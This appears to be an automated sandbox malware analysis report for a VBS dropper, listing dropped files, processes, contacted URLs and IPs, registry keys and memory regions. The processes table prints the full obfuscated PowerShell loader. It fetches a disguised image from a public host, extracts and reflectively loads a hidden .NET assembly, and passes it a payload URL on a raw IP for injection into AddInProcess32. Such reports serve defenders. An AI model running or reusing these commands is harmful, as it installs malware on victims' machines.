Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
0KRPn.vbs
|
Unicode text, UTF-8 text, with very long lines (11721), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xa179b67d, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4w43korf.3bs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmjvpzkk.bls.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf0htza0.cxa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwqs5frq.lmr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0KRPn.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRQBMDgTreEkDgTreRgBFDgTreE4DgTreTwBFDgTreFYDgTreQQBIDgTreFUDgTreTwBZDgTreC8DgTreODgTreDgTrexDgTreC4DgTreMwDgTreyDgTreDEDgTreLgDgTre1DgTreDQDgTreMgDgTreuDgTreDIDgTreNwDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreQQBkDgTreGQDgTreSQBuDgTreFDgTreDgTrecgBvDgTreGMDgTreZQBzDgTreHMDgTreMwDgTreyDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ELIFENOEVAHUOY/81.321.542.271//:ptth' , 'desativado' , 'desativado'
, 'desativado','AddInProcess32',''))} }"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
104.21.45.138
|
|
|
|
http://172.245.123.18/YOUHAVEONEFILE.txt
|
172.245.123.18
|
|
|
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
uploaddeimagens.com.br
|
104.21.45.138
|
|
|
|
ip-api.com
|
208.95.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.45.138
|
uploaddeimagens.com.br
|
United States
|
|
|
|
172.245.123.18
|
unknown
|
United States
|
|
|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 20 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
24DB922A000
|
heap
|
page read and write
|
||
|
1F892C61000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226C0000
|
unkown
|
page readonly
|
||
|
2E7E000
|
trusted library allocation
|
page read and write
|
||
|
24DBB150000
|
heap
|
page read and write
|
||
|
7FFB226E2000
|
unkown
|
page readonly
|
||
|
1F89AD70000
|
heap
|
page execute and read and write
|
||
|
2D81000
|
trusted library allocation
|
page read and write
|
||
|
248E145B000
|
heap
|
page read and write
|
||
|
8F54FE000
|
stack
|
page read and write
|
||
|
248E69D0000
|
trusted library allocation
|
page read and write
|
||
|
248E1496000
|
heap
|
page read and write
|
||
|
24DB920A000
|
heap
|
page read and write
|
||
|
24DB9157000
|
heap
|
page read and write
|
||
|
248E6AFC000
|
heap
|
page read and write
|
||
|
7FFAACBBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C42000
|
trusted library allocation
|
page read and write
|
||
|
24DB9197000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
248E6AC5000
|
heap
|
page read and write
|
||
|
25B83D48000
|
trusted library allocation
|
page read and write
|
||
|
F7F000
|
heap
|
page read and write
|
||
|
1F880D6A000
|
heap
|
page read and write
|
||
|
1F89AD00000
|
heap
|
page read and write
|
||
|
248E6A18000
|
heap
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
7FFAACBB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
B73A37E000
|
unkown
|
page readonly
|
||
|
B73A97E000
|
unkown
|
page readonly
|
||
|
248E6860000
|
trusted library allocation
|
page read and write
|
||
|
2A72000
|
trusted library allocation
|
page read and write
|
||
|
1F8832FC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226E0000
|
unkown
|
page read and write
|
||
|
6490000
|
heap
|
page read and write
|
||
|
B73AD7E000
|
unkown
|
page readonly
|
||
|
5FEC000
|
heap
|
page read and write
|
||
|
248E1C02000
|
heap
|
page read and write
|
||
|
2A76000
|
trusted library allocation
|
page execute and read and write
|
||
|
94B0EFF000
|
stack
|
page read and write
|
||
|
24DB917C000
|
heap
|
page read and write
|
||
|
248E6AED000
|
heap
|
page read and write
|
||
|
B73B67B000
|
stack
|
page read and write
|
||
|
6EC5F000
|
unkown
|
page readonly
|
||
|
24DB91CD000
|
heap
|
page read and write
|
||
|
7FFB226D6000
|
unkown
|
page readonly
|
||
|
6430000
|
trusted library allocation
|
page execute and read and write
|
||
|
248E1330000
|
heap
|
page read and write
|
||
|
248E68F0000
|
trusted library allocation
|
page read and write
|
||
|
25B85FA1000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
trusted library allocation
|
page read and write
|
||
|
1F89AE10000
|
heap
|
page read and write
|
||
|
641E000
|
stack
|
page read and write
|
||
|
2A82000
|
trusted library allocation
|
page read and write
|
||
|
1F8831B4000
|
trusted library allocation
|
page read and write
|
||
|
1F88330F000
|
trusted library allocation
|
page read and write
|
||
|
8ECBBFE000
|
stack
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DBAC37000
|
heap
|
page read and write
|
||
|
557C000
|
stack
|
page read and write
|
||
|
7F090000
|
trusted library allocation
|
page execute and read and write
|
||
|
1052000
|
heap
|
page read and write
|
||
|
1F883081000
|
trusted library allocation
|
page read and write
|
||
|
642B000
|
trusted library allocation
|
page read and write
|
||
|
94B13BF000
|
stack
|
page read and write
|
||
|
8ECC1FB000
|
stack
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
1F882D24000
|
trusted library allocation
|
page read and write
|
||
|
1F89ACAD000
|
heap
|
page read and write
|
||
|
7FFAACBB4000
|
trusted library allocation
|
page read and write
|
||
|
2B80000
|
heap
|
page execute and read and write
|
||
|
5927000
|
trusted library allocation
|
page read and write
|
||
|
1F881045000
|
heap
|
page read and write
|
||
|
F99000
|
heap
|
page read and write
|
||
|
102B000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
25B877FC000
|
trusted library allocation
|
page read and write
|
||
|
B73A57E000
|
unkown
|
page readonly
|
||
|
24DBAC36000
|
heap
|
page read and write
|
||
|
248E6C90000
|
remote allocation
|
page read and write
|
||
|
248E148D000
|
heap
|
page read and write
|
||
|
24DBB17B000
|
heap
|
page read and write
|
||
|
1F892C00000
|
trusted library allocation
|
page read and write
|
||
|
24DB923C000
|
heap
|
page read and write
|
||
|
8F557F000
|
stack
|
page read and write
|
||
|
B73AEFE000
|
stack
|
page read and write
|
||
|
1F882C91000
|
trusted library allocation
|
page read and write
|
||
|
248E1513000
|
heap
|
page read and write
|
||
|
1F882D5A000
|
trusted library allocation
|
page read and write
|
||
|
248E142B000
|
heap
|
page read and write
|
||
|
64A0000
|
trusted library allocation
|
page read and write
|
||
|
1F882FD6000
|
trusted library allocation
|
page read and write
|
||
|
25B83DCD000
|
trusted library allocation
|
page read and write
|
||
|
1F882D07000
|
trusted library allocation
|
page read and write
|
||
|
567E000
|
stack
|
page read and write
|
||
|
94B143E000
|
stack
|
page read and write
|
||
|
1F8826A0000
|
heap
|
page readonly
|
||
|
25B82BE1000
|
trusted library allocation
|
page read and write
|
||
|
D59000
|
stack
|
